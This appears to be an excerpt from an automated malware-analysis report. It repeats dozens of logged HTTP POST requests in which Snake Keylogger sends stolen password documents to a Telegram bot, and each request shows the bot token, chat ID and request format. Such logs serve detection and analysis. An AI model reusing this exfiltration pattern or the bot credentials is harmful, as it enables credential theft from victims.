                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e04626c2Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e081c1a8Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e0bfbe99Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e0fb5a83Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e13958acHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e16dcca0Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e1abc791Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e1e9c42eHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e22c895bHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e2635c53Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e2a8802eHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e2e41b12Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e329424cHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e3673d16Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e3a9ffd1Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e3e7fb9cHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e43b6d80Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e4724548Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e4adde3eHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e4ebdb2fHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e52776ddHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e56c9a34Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e5a36ffbHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e5d7e39bHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e615e0c5Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e6517b64Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e688517cHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e6c3ec41Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e701e98cHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e73d84c1Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e7745a71Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e7aff527Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e7e6caceHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e82bef06Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e8a58707Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e936f62bHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e98a6837Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e9bedca3Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ea0b2858Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ea492460Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ea7d9812Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756eabb954aHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756eaf730d3Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756eb3c569cHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756eb7a5109Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ebbf7543Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ebf3e97aHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ec31e688Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ec6d811dHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756eca456b6Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ece719b2Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ed25162aHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ed598a5eHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ed97869eHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756edd5834dHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ee09fa00Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ee4f1b35Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ee838fabHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756eec18c9cHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756eefd27b9Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ef33fcf5Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ef6f989bHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756efad95baHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756efe20a71Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f0200579Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f0547b32Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f09276e5Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f0d07341Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f10c111aHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f142e3e0Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f17e7ee5Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f1b5550fHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f1f0f03dHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f24462a8Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f290ad11Host: api.telegram.orgContent-Length: 504
